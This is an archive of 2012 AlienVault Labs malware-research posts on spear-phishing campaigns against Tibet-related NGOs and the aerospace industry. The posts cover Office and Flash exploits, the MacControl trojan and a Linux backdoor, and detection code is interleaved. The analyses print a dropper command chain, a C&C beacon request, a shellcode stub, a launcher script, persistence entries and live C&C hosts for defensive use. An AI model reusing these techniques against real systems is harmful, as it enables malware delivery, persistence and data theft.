Alienvault R&D Labs Portal. Get the latest news from our research.
Author Archives: jaime.blasco

A couple of days ago, Adobe issued a security update for Adobe Flash Player fixing a vulnerability that has been detected in the wild in attacks against specific targets.

Several spear-phishing campaigns have been detected. The mails sent carry a Word document attachment that contains a reference to a Flash file, which is downloaded from a remote server once the document is opened. This Flash file exploits the CVE-2012-0779 vulnerability, triggering shellcode that looks for the payload inside the original Word document. The payload is decoded using a one-byte XOR scheme, dropped on the system and then executed.

Most of the malicious Flash files have low AV detection rates so it is very important to apply the vendor’s patch.
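The one-byte XOR scheme described above is simple enough to brute-force when analysing a suspicious document. The following Python is an added example, not code from the post or from AlienVault: it tries all 256 keys against a constructed sample (a fake PE embedded in filler bytes; the key 0x5A and the offsets are made up) and reports where a decoded DOS-stub string with an MZ header shortly before it appears, then carves the decoded payload.

```python
import re

# Constructed sample: a minimal fake PE (MZ header plus the DOS-stub string)
# XOR-encoded with a single byte and buried in filler that stands in for a
# Word document. Neither the key nor the offsets come from real samples.
XOR_KEY = 0x5A
DOS_STUB = b"This program cannot be run in DOS mode."
FAKE_PE = b"MZ" + b"\x90" * 62 + DOS_STUB + b"\x00" * 32
SAMPLE_DOC = (b"\xd0\xcf\x11\xe0" + b"A" * 100          # OLE magic + filler
              + bytes(b ^ XOR_KEY for b in FAKE_PE)     # encoded payload
              + b"B" * 50)


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a one-byte XOR key to every byte."""
    return bytes(b ^ key for b in data)


def find_xored_payloads(blob: bytes, marker: bytes = DOS_STUB, window: int = 256):
    """Try all 256 one-byte keys and return (key, offset) pairs where the
    decoded blob shows the DOS-stub marker with an MZ header at most `window`
    bytes before it. Key 0 corresponds to an unencoded PE, so plaintext
    embeds are reported as well."""
    hits = []
    for key in range(256):
        encoded_marker = xor_bytes(marker, key)
        for m in re.finditer(re.escape(encoded_marker), blob):
            start = max(0, m.start() - window)
            decoded = xor_bytes(blob[start:m.start()], key)
            mz = decoded.rfind(b"MZ")
            if mz != -1:
                hits.append((key, start + mz))
    return hits


def carve(blob: bytes, key: int, offset: int, length=None) -> bytes:
    """Return the decoded payload starting at offset (the whole tail if no length)."""
    end = None if length is None else offset + length
    return xor_bytes(blob[offset:end], key)


if __name__ == "__main__":
    for key, offset in find_xored_payloads(SAMPLE_DOC):
        payload = carve(SAMPLE_DOC, key, offset)
        print(f"key=0x{key:02x} offset={offset} header={payload[:2]!r}")
```

Searching for the encoded DOS-stub string rather than for an encoded "MZ" keeps false positives down: two bytes match by chance under some key in almost any file, a 39-byte string does not. The carved bytes can then be hashed and compared against the VirusTotal reports the post links to.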

We have seen several documents sent to a wide range of industries as well as Tibet-related NGOs. Some examples are:

[figure: example documents, images not reproduced]
Once the victim opens the document, the malicious Flash file is downloaded from a remote server:

[figure: the Flash file download, image not reproduced]
In the vast majority of the documents we have analyzed, the malicious files are hosted on hacked websites.

We will release more information as well as IDS signatures to detect some of the payloads we have seen so far.

The number of samples exploiting CVE-2012-0158 has been growing since we reported some of the first infections last week. We have been detecting several ongoing campaigns against different industries. One campaign that attracted our attention targets the military and aerospace industry.

Some of the documents sent to the victims still have low antivirus detection. For example, one of the files sent is called “SMD_Conference_2012.doc”.

https://www.virustotal.com/file/b2b2091ed7d211b713353affa7e4e6585ae8abbbc8fc3eede74d0c93f39a7f6b/analysis/

When the victim opens the malicious document, the shellcode drops the malware and a benign Office file, then executes the dropped binary and shows the Office file:

cmd /c echo MZ>log1.txt && cmd /c copy /b log1.txt+fabc.scr abc.scr && cmd /c abc.scr && cmd /c del log1.txt && cmd /c del fabc.scr

cmd /c SMD_Conference2012.doc

The first command line writes an MZ marker to log1.txt with echo and prepends it to fabc.scr, which is dropped without its executable header; the concatenated abc.scr is a complete PE file, which is run before the two intermediate files are deleted. The second command line opens the decoy document, so the victim is shown the following:

[figure: the decoy document shown to the victim, image not reproduced]

The binary created by the shellcode is a dropper that contains the actual malware embedded in a resource. After deciphering the content, it creates the new binary under \Documents and Settings\{UserName}\Local Settings\Application Data\GoogleUpdate.exe and creates the following registry value in order to maintain persistence:

\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

GoogleUpd SZ "C:\\Documents and Settings\\Joe Maldive\\Local Settings\\Application Data\\GoogleUpdate.exe"

The payload is detected as BKDR_FYNLOS.SM1 and has been used in other similar attacks in the past. The malware connects to the C&C server at 204.13.66.119.

The following HTTP request is sent to the C&C server:

GET /search54615?h1=51&h2=1&h3=fh17952&h4=FNFACAADHFBCEIFJFEFGFAAA HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible;AEAFAKEBFDENBMECAOAHFCAEABBDEJ;)
Host: 204.13.66.119
Connection: Keep-Alive

The values sent are the operating system version (5.1 = Windows XP), the encoded serial number of the machine and the encoded version of the machine name.

It seems to be a version of the MSUpdater trojan that Zscaler described a few months ago. Once again the group behind these attacks is using conference-related subjects as a lure to target these industries.

You can use the following Snort rule, already present in the Emerging Threats ruleset, to detect the C&C traffic:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Win32/Cryptrun.B/MSUpdater C&C traffic 1"; flow:from_client,established; content:"/search"; http_uri; content:"?h1="; fast_pattern; http_uri; content:"&h2="; distance:0; http_uri; content:"&h3="; distance:0; http_uri; content:"User-Agent|3a| Mozilla/5.0 (compatible|3B|"; http_header; reference:url,blog.9bplus.com/kim-jong-il-pdf-malware; reference:url,www.seculert.com/reports/MSUpdaterTrojanWhitepaper.pdf; reference:url,research.zscaler.com/2012/01/msupdater-trojan-and-link-to-targeted.html; reference:url,blog.seculert.com/2012/01/msupdater-trojan-and-conference-invite.html; classtype:trojan-activity; sid:2014174; rev:4;)
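The rule above keys on an ordered set of URI tokens plus the User-Agent prefix. As an added example, not code from the post or from Emerging Threats, the following Python reimplements those content checks over a few constructed proxy-log lines (the first reproduces the request quoted above, the others are benign look-alikes) and splits a matched query string into the fields the post describes. Which h-parameter carries which value is an assumption made here; the post only names the three values.

```python
from urllib.parse import parse_qs, urlsplit

UA_PREFIX = "Mozilla/5.0 (compatible;"
URI_TOKENS = ("?h1=", "&h2=", "&h3=")
WINDOWS_VERSIONS = {"5.1": "Windows XP"}   # the only mapping given in the post

# Constructed proxy-log lines: method, URI, User-Agent, tab separated.
SAMPLE_LOG = "\n".join([
    "GET\t/search54615?h1=51&h2=1&h3=fh17952&h4=FNFACAADHFBCEIFJFEFGFAAA\t"
    "Mozilla/5.0 (compatible;AEAFAKEBFDENBMECAOAHFCAEABBDEJ;)",
    "GET\t/search?q=snort+h1&h2=1\tMozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0",
    "GET\t/search?h1=51&h3=x&h2=1\tMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)",
])


def matches_msupdater_beacon(uri: str, user_agent: str) -> bool:
    """Mirror the ET rule: '/search' anywhere in the URI, '?h1=' anywhere,
    then '&h2=' and '&h3=' each after the previous match (Snort's distance:0),
    and a User-Agent beginning 'Mozilla/5.0 (compatible;'."""
    if "/search" not in uri:
        return False
    pos = 0
    for token in URI_TOKENS:
        pos = uri.find(token, pos)
        if pos == -1:
            return False
        pos += len(token)
    return user_agent.startswith(UA_PREFIX)


def decode_beacon(uri: str) -> dict:
    """Split the query into the values the post describes. Assumption: h1 is the
    OS version ("51" -> 5.1), h3 the encoded serial, h4 the encoded hostname."""
    query = parse_qs(urlsplit(uri).query)

    def first(key: str) -> str:
        return query.get(key, [""])[0]

    h1 = first("h1")
    version = f"{h1[0]}.{h1[1:]}" if len(h1) >= 2 else h1
    return {
        "os_version": version,
        "os_name": WINDOWS_VERSIONS.get(version, "unknown"),
        "h2": first("h2"),
        "serial_encoded": first("h3"),
        "hostname_encoded": first("h4"),
    }


def scan_log(text: str) -> list:
    """Return decoded beacons for every log line the rule logic would alert on."""
    alerts = []
    for line in text.splitlines():
        try:
            method, uri, user_agent = line.split("\t")
        except ValueError:
            continue  # malformed line, skip it
        if method == "GET" and matches_msupdater_beacon(uri, user_agent):
            alerts.append(decode_beacon(uri))
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The third sample line carries all three tokens but in the wrong order, which is why the rule's distance:0 modifiers matter: without the ordering, a benign search URL with those parameter names would fire the signature.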

CVE-2012-0158, Tibet, Targeted Attacks and so on

April 18th, 2012 | Posted by jaime.blasco in APT | Attacks | Malware

As our friends at TrendMicro reported a couple of days ago, CVE-2012-0158 is being actively used in different spear-phishing campaigns, mainly against NGOs and Tibet-related organizations.

The vulnerability used was patched by Microsoft a week ago:

The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers “system state” corruption, as exploited in the wild in April 2012, aka “MSCOMCTL.OCX RCE Vulnerability.”

We have found several targeted RTF files dropping different trojans and RATs onto the victims. One of the malicious files is very similar to what TrendMicro described a couple of days ago, but it shows how quickly the attackers adapt their code to what security companies publish in order to avoid signature and AV detection.

Once you open the RTF document, it drops the malicious executable as well as a benign doc file:

Immolation Statement.doc

[figure: image not reproduced]

The dropped exe file has a low AV detection rate:

https://www.virustotal.com/file/b7c6522ce21bd230c33e3f250d9789395af932e7fc72c9e0c1304c0bbcaa5e61/analysis/1334789684/

https://www.virustotal.com/file/eb6901caaf90e7e04b5c79d33aaa4aa3f3139cfb179418f78555e0c724b9e09f/analysis/1334790589/

More interestingly, it is digitally signed, apparently by the same signer TrendMicro described, but this time the certificate is valid and the file was signed on the 16th.

[figure: image not reproduced]

The trojan connects to the following domains:

  • 1.test.3322.org.cn -> 64.62.224.75
  • 2.test.3322.org.cn -> 74.82.63.102
  • 3.test.3322.org.cn -> 74.82.63.102
  • 4.test.3322.org.cn -> 64.62.224.75
  • 123ewqasdcxz.xicp.net, now pointing to 0.0.0.0
  • hoop-america.oicp.net -> 222.132.195.5

We have collected several documents/mails exploiting CVE-2012-0158 and will publish more information about the ongoing campaigns. Stay tuned!


Mac OS X trojan encryption routines found in a Linux backdoor

March 28th, 2012 | Posted by jaime.blasco in News

We were working on some information related to the C&C protocol used by the Mac OS X trojan we discovered last week. ESET already did a great job, and you can read all the information there. As ESET said, the C&C protocol uses AES and XOR to encrypt all the underlying communications. For the XOR cipher they use hardcoded keys:

[figures: the hardcoded XOR keys, images not reproduced]

They also add a SHA1 hash to every packet to authenticate and check the integrity of the communication.

Based on the encryption method, we have found a Linux backdoor that uses the same underlying encryption with the same keys and that has been around at least since late 1999 (based on VirusTotal submissions).

This could indicate that they are reusing code published on underground forums, or that the same group has been using this backdoor to maintain persistence on Linux systems.

The file in question is this one:

https://www.virustotal.com/file/a3ffc25db2403b3f70719b151b106e53b3abbf1f81c9147a40664605b5b573d7/analysis/

The backdoor:

- First checks that it has enough privileges to run (it requires root).
- Then writes its PID to a file under /dev/hdsmat.
- Forks and changes the process name to ‘-bash’.
- Opens a raw socket: socket(PF_INET, SOCK_RAW, IPPROTO_TCP).
- This is a kind of port-knocking technique: it waits for a packet that contains the following string:
- Once it receives that packet, it opens a connection to the machine that sent the packet, using port 3133.
- All following communication uses the same XOR/AES encryption to exchange data.
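The behaviour in that list leaves host-side traces: a process whose name is ‘-bash’ but whose executable is not a shell, a raw IPPROTO_TCP socket held open to sniff for the trigger packet, and the PID file under /dev/hdsmat. The following Python is an added example, not code from the post: the matching logic runs over a constructed /proc/net/raw excerpt and process snapshot (the inodes, PIDs and the /tmp/.x path are made up), and collect_live_processes() gathers the same shape of data from a real Linux host.

```python
import os

PID_FILE = "/dev/hdsmat"   # path named in the post

# Constructed /proc/net/raw content: one raw IPv4 socket. For raw sockets the
# "port" half of local_address holds the protocol number (0006 = IPPROTO_TCP).
SAMPLE_PROC_NET_RAW = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops\n"
    "   0: 00000000:0006 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 18823 2 0000000000000000 0\n"
)

# Constructed process snapshot: a genuine login shell, a fake one whose argv[0]
# claims '-bash' but whose binary is not bash and which holds the raw socket,
# and an unrelated daemon.
SAMPLE_PROCS = [
    {"pid": 1000, "cmdline": "-bash", "exe": "/bin/bash", "socket_inodes": set()},
    {"pid": 4242, "cmdline": "-bash", "exe": "/tmp/.x", "socket_inodes": {"18823"}},
    {"pid": 4300, "cmdline": "sshd: root", "exe": "/usr/sbin/sshd", "socket_inodes": {"777"}},
]


def raw_tcp_socket_inodes(proc_net_raw: str) -> set:
    """Inodes of raw sockets bound to IPPROTO_TCP (local 'port' 0006) in /proc/net/raw."""
    inodes = set()
    for line in proc_net_raw.splitlines()[1:]:   # skip the header line
        fields = line.split()
        if len(fields) >= 10 and fields[1].endswith(":0006"):
            inodes.add(fields[9])
    return inodes


def suspicious_processes(procs, raw_inodes: set) -> list:
    """Flag processes that look like the backdoor: argv[0] of '-bash' whose
    executable is not bash, and/or ownership of a raw IPPROTO_TCP socket."""
    findings = []
    for p in procs:
        reasons = []
        if p["cmdline"] == "-bash" and not p["exe"].endswith("/bash"):
            reasons.append(f"argv[0] is '-bash' but exe is {p['exe']}")
        if p["socket_inodes"] & raw_inodes:
            reasons.append("holds a raw IPPROTO_TCP socket")
        if reasons:
            findings.append((p["pid"], reasons))
    return findings


def collect_live_processes() -> list:
    """Best-effort snapshot from /proc in the same shape as SAMPLE_PROCS
    (root is needed to read other users' exe links and fd tables)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().split(b"\0")[0].decode(errors="replace")
            exe = os.readlink(f"/proc/{pid}/exe")
            inodes = set()
            for fd in os.listdir(f"/proc/{pid}/fd"):
                target = os.readlink(f"/proc/{pid}/fd/{fd}")
                if target.startswith("socket:["):
                    inodes.add(target[len("socket:["):-1])
        except OSError:
            continue   # process exited or permission denied
        procs.append({"pid": int(pid), "cmdline": cmdline, "exe": exe, "socket_inodes": inodes})
    return procs


if __name__ == "__main__":
    if os.path.exists(PID_FILE):
        print(f"PID file {PID_FILE} is present")
    with open("/proc/net/raw") as f:
        raw = raw_tcp_socket_inodes(f.read())
    for pid, reasons in suspicious_processes(collect_live_processes(), raw):
        print(pid, "; ".join(reasons))
```

Login shells legitimately show up as ‘-bash’, which is why the check compares the name against the resolved executable instead of alerting on the name alone; a raw TCP socket in a process that is not a packet-capture or routing tool is the stronger of the two signals.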

Based on a post published late last year, it seems that someone found a similar backdoor that was uploaded to a system after a successful SSH brute-forcing attack. The backdoor described there doesn’t have the underlying encryption, but it uses the same “port-knocking” code.

Maybe someone recognizes parts of this code and can point us to an already known backdoor.


Continuing our research on the Tibet attacks, we have found more Mac trojans and some interesting MS Office files that deliver them. The group behind these attacks is the same one we have been tracking for a while:

AlienVault Tibet related Research now used to target Tibetan non-governmental organizations

We believe this group is also the same as the group TrendMicro uncovered some days ago:

Malicious Email Campaign Uses Current Socio-Political Events as Lure for Targeted Attack

The doc files seem to exploit MS09-027 and target Microsoft Office for Mac. This is one of the few times we have seen a malicious Office file used to deliver malware on Mac OS X.

http://technet.microsoft.com/en-us/security/bulletin/MS09-027

A remote code execution vulnerability exists in the way that Microsoft Office Word handles a specially crafted Word file that includes a malformed record. An attacker who successfully exploits this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

When the victim opens the malicious Word file with Office for Mac, the shellcode writes the malicious payload to disk, executes it, and then opens a benign Office file with the following content:

[figure: content of the benign decoy document, image not reproduced]

The first stage copies the payload into the __IMPORT section of dyld using memcpy, pushing the arguments cdecl-style (size, source, destination) and then the destination a second time as the return address, so that when memcpy returns it lands in the freshly copied payload:

push dword 0x1be        # payload size
push edx                # source: the payload
push dword 0x8fe6f318   # destination: dyld __IMPORT (rwx)
push dword 0x8fe6f318   # pushed again as the return address, so memcpy returns into the copied payload
mov ebx, 0x8fe2e130     # memcpy
jmp ebx

The second stage writes the necessary files to /tmp/ (a shell script, the benign doc file and the binary) and then executes the shell script (/tmp/launch-hs):

fstat(0x2, 0xBFFF4CD0, 0x200)

fstat(0x24, 0xBFFF4CD0, 0x200)
lseek(0x24, 0x6600, 0x0) # file offset in the doc file
open("/tmp/launch-hs\0", 0x602, 0x1FF)
open("/tmp/launch-hse\0", 0x602, 0x1FF)
open("/tmp/file.doc\0", 0x602, 0x1FF)

read(0x24, "#!/bin/sh\n/tmp/launch-hse &\nopen /tmp/file.doc &\n\n\0", 0x32)
write(0x26, "#!/bin/sh\n/tmp/launch-hse &\nopen /tmp/file.doc &\n\n\0", 0x32) …

close(0x28)
vfork()
execve(0x28, 0xBFFF4B80, 0x0)

Shell script /tmp/launch-hs:

#!/bin/sh
/tmp/launch-hse &
open /tmp/file.doc &

A couple of doc files drop the previous Mac Trojan we reported last week.

The only difference is the .pslist used:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.docserver</string>
<key>Program</key>
<string>/Applications/Automator.app/Contents/MacOS/DockLight</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
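A launch agent whose Label impersonates Apple (com.apple.docserver here, com.apple.FolderActionxsl for the MacControl trojan described further down) but whose Program points outside Apple's own locations is what this persistence looks like on disk. The following Python is an added example, not code from the post, built on the standard plistlib module: it audits the plist above (embedded as a constructed copy with straightened quotes) and can scan the usual LaunchAgents and LaunchDaemons directories. Which path prefixes count as Apple-owned or user-writable are assumptions made here.

```python
import glob
import os
import plistlib

# Assumed path classes: Apple's own binaries live under these prefixes, and
# these are the user-writable places where a dropped payload typically lands.
APPLE_PATHS = ("/System/", "/usr/", "/Library/Apple/")
USER_WRITABLE = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/", "/Library/launched")

# Constructed copy of the launch agent quoted in the post.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.apple.docserver</string>
<key>Program</key><string>/Applications/Automator.app/Contents/MacOS/DockLight</string>
<key>RunAtLoad</key><true/>
</dict>
</plist>"""


def audit_launch_agent(data: bytes) -> list:
    """Return a list of findings (empty when nothing looks wrong) for one plist."""
    plist = plistlib.loads(data)
    label = str(plist.get("Label", ""))
    program = plist.get("Program") or (plist.get("ProgramArguments") or [""])[0]
    findings = []
    if label.startswith("com.apple.") and not program.startswith(APPLE_PATHS):
        findings.append(f"label {label!r} impersonates Apple but runs {program}")
    if program.startswith(USER_WRITABLE):
        findings.append(f"program lives in a user-writable location: {program}")
    if plist.get("RunAtLoad") and findings:
        findings.append("RunAtLoad is set, so it starts at every login")
    return findings


def scan_launch_agents(dirs=None) -> dict:
    """Audit every launch agent/daemon plist in the given directories
    (defaults to the standard system and per-user locations)."""
    dirs = dirs or [
        "/Library/LaunchAgents",
        "/Library/LaunchDaemons",
        os.path.expanduser("~/Library/LaunchAgents"),
    ]
    results = {}
    for d in dirs:
        # launchd loads *.plist; *.pslist is included because the post names such files
        paths = glob.glob(os.path.join(d, "*.plist")) + glob.glob(os.path.join(d, "*.pslist"))
        for path in paths:
            try:
                with open(path, "rb") as f:
                    findings = audit_launch_agent(f.read())
            except Exception as exc:   # unreadable or malformed plist is itself worth a look
                findings = [f"could not parse: {exc}"]
            if findings:
                results[path] = findings
    return results


if __name__ == "__main__":
    for finding in audit_launch_agent(SAMPLE_PLIST):
        print("sample plist:", finding)
    for path, findings in scan_launch_agents().items():
        print(path, "->", "; ".join(findings))
```

The check deliberately does not trust the app bundle path: Automator.app is a real Apple application, but the DockLight binary inside it is not, which is exactly the kind of disguise a label-only or path-only rule would miss.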

The C&C server this time is:

- 2012.slyip.net : 173.255.160.234

173.255.160.128 – 173.255.160.255
Black Oak Computers Inc – New York – 75 Broad Street
New York, NY, US


The second trojan is a new one that has not been seen before. We have found several versions compiled for different architectures (ppc, i386, ...). We have also found a version that contains paths to debugging symbols:

/Developer/longgegeProject/Mac Control/MacControl V1.1.1/build/Foundation_Hello.build/Release/Foundation_Hello.build/Objects-normal/ppc/Foundation_Hello.o

/Developer/longgegeProject/Mac Control/MacControl V1.1.1/build/Foundation_Hello.build/Release/Foundation_Hello.build/Objects-normal/i386/Foundation_Hello.o

So the group seems to have a project called “longgege”, and they call the trojan itself “MacControl”.

The trojan performs the following actions:

- Copies itself into /Library/launched
- Creates /Users/{User}/Library/LaunchAgents/com.apple.FolderActionxsl.pslist

This is how it maintains persistence: the trojan will be executed when the computer starts.

- It then reads the configuration parameters stored at the end of the binary file:
  - domain: freetibet2012.xicp.net, port: 80
- Establishes a connection to the host present in the configuration parameters.
- Sends some information about the victim: username, hostname, system version...

[figures: the victim information sent to the C&C, images not reproduced]

- The trojan will then wait for commands from the C&C.

The attackers can then send commands to the victim to open a remote shell, send files, receive files, delete files, and so on.

The C&C domain freetibet2012.xicp.net resolves to 114.249.207.194:

114.240.0.0 – 114.255.255.255
China Unicom Beijing province network
China Unicom

All the samples we have found, including the malicious doc files, have a 0/0 antivirus detection rate.

We will publish a technical analysis of the trojan capabilities and some tips to detect these threats. Stay tuned!

Thanks to Rubén Santamarta @reversemode for his help during the analysis.